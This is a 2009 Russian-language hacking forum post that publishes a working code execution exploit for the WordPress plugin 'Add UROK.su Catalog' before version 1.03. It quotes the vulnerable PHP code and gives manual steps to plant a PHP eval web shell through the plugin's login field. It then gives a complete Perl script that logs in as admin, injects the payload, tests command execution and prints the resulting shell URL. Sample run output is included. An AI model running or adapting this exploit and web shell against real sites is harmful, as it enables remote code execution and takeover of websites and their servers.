15.07.2009, 19:54
|
|
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами:
9423746
Репутация:
2399
|
|
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
надо логин:пароль админа 
Код:
Wordpress plugin Add UROK.su Catalog < 1.03 Code Execution Exploit
------------
http://wordpress.org/extend/plugins/add-uroksu-catalog/
Add UROK.su Catalog
Version: 1.03
------------
\wp-content\plugins\add-uroksu-catalog\urok.su.class.php
----------------------------------------------------------------------
|56| if (isset($_POST['UPDATE'])) {
|57| MyUROKsu_user=$_REQUEST['login'];
|58| $file_name=$file_name=dirname(__FILE__).'/login.txt';
|59| $w=fopen($file_name,'w');
|60| fwrite($w,$MyUROKsu_user);
|61| fclose($w);
|62| print($this->update_catalog($MyUROKsu_user));
|63| echo '</p>';
|64| }
----------------------------------------------------------------------
Steps to code execution:
1) /wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php
POST: UPDATE=.& login=<?php=@eval($_GET['c']);?>
(your code will be saved to file:
/wp-content/plugins/add-uroksu-catalog/login.txt)
2) include this file & code execute:
/wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=system('id');
perl exploit:
----------------------------------------------------------------------
PHP код:
#! /usr/bin/perl -w
use LWP::UserAgent;
use warnings;
print "\n WP ] add-uroksu-catalog < 1.03 [ exploit\n";
print " eLwaux(c)uasc 2009\n\n";
if (!$ARGV[2]) {
print " usage:\n".
" expl.pl http://site.com/wp/index.php adminLogin adminPass\n".
exit(0);
}
my $mHost = $ARGV[0];
my $mAdmL = $ARGV[1];
my $mAdmP = $ARGV[2];
#$mAdmL =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
#$mAdmP =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg;
my $HOST = $1 if ($mHost =~ /http:\/\/(.+?)\//);
my $UA = LWP::UserAgent->new;
$UA->timeout(20);
$UA->default_header('Referer' => $mHost.'wp-login.php');
$UA->default_header('Cookie' => 'wordpress_test_cookie=WP+Cookie+check;');
# login to WP
my $page = $UA->post($mHost.'wp-login.php',
{
log => $mAdmL,
pwd => $mAdmP,
# rememberme => 'forever',
submit => 'Войти',
redirect_to => $mHost.'wp-admin/',
testcookie => 1
}
)->as_string;
my $cookie = '';
my @SetCookie = ($page =~ m/Set-Cookie: (.+?=.+?);/g);
foreach my $SC (@SetCookie) {
$cookie .= $SC.';';
}
if (length($cookie)<100) {
print ' - bad login:password!';
exit(0);
}
print ' - good login:password!'."\n";
$UA->default_header('Cookie' => $cookie);
print ' .. sending exploit..'."\n";
# send EXPLOIT
$page = $UA->post($mHost.'wp-admin/options-general.php?page=urok_su_wp/urok_su_wp.php',
{
login => '<?php @eval($_GET[\'c\']);?>',
UPDATE => 1
}
)->as_string;
print ' + exploit send!'."\n";
# try execute simple code
$page = $UA->get($mHost.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c=print_r($_SERVER);')->as_string;
if ($page =~ /\[SERVER_SOFTWARE\] => (.+?)[\r\n]+/) {
print ' + result of test1: '.$1."\n";
print ' + result of test2: '.$1."\n" if ($page =~ /\[SCRIPT_FILENAME\] => (.+?)[\r\n]+/);
} else {
print ' - perhaps code is not injected!'."\n";
}
print ' ! FINISH!'."\n\n";
print ' !! your shell:'."\n";
print ' '.$mHost."\n".
' '.'wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}'."\n";
exit(0);
Код:
----------------------------------------------------------------------
simple result on localhost:
----------------------------------------------------------------------
> expl.pl http://localhost/cms/wordpress/ admin "4#@!v^w!*)kW"
WP ] add-uroksu-catalog < 1.03 [ exploit
eLwaux(c)uasc 2009
- good login:password!
.. sending exploit..
+ exploit send!
+ result of test1: Apache/2.2.11 (Win32) PHP/5.2.9-2
+ result of test2: C:/wamp/www/cms/wordpress/wp-admin/admin.php
! FINISH!
!! your shell:
http://localhost/cms/wordpress/
wp-admin/admin.php?page=add-uroksu-catalog/login.txt&c={eViLcOdE}
----------------------------------------------------------------------
Последний раз редактировалось eLWAux; 15.07.2009 в 21:38..
|
|
|